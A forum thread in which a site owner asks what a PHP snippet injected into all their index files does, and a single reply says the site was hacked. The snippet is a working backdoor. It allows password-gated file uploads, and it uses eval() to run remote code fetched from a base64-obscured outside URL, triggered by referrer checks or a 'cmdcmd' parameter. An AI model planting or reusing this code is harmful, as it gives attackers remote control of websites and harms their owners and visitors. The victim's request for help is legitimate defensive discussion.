Malicious code at the top of the page, what could it be?

F

freelancepro2018-03-29 11:10:51

PHP

freelancepro, 2018-03-29 11:10:51

Hello!
In all index.html files on all sites, this code appeared at the top of the page:

<?php
ini_set('display_errors','Off'); error_reporting('E_ALL');
setcookie('server',1,time()+1e6);$s=$_SERVER;$sr=$s['HTTP_REFERER'];$sh=$s['HTTP_HOST'];$cs=$_COOKIE['server'];
if(isset($_FILES['u']) && isset($_POST['n']) && isset($_POST['hash']) && md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')
{
  move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);
}
elseif(($sr && !strpos($sr,$sh) && $cs!=1) || $c=$_GET['cmdcmd'])
{
  eval(file_get_contents(base64_decode('aHR0cDovL3FiMC5ydS93Lz91PQ==').$sh.'&c='.$c));
}
?>

and the index.html files are automatically renamed to index.php
1st time I restored the backup, everything became normal, but a week later I started changing the old files, the same thing appeared again.
What could it be and how to deal with it? Thanks in advance!

Reply

Answer the question

In order to leave comments, you need to log in

1 answer(s)

A

Anton fon Faust, 2018-03-29
@bubandos

hacked the site. Look, somewhere there is a hole that allows you to fill in any heresy.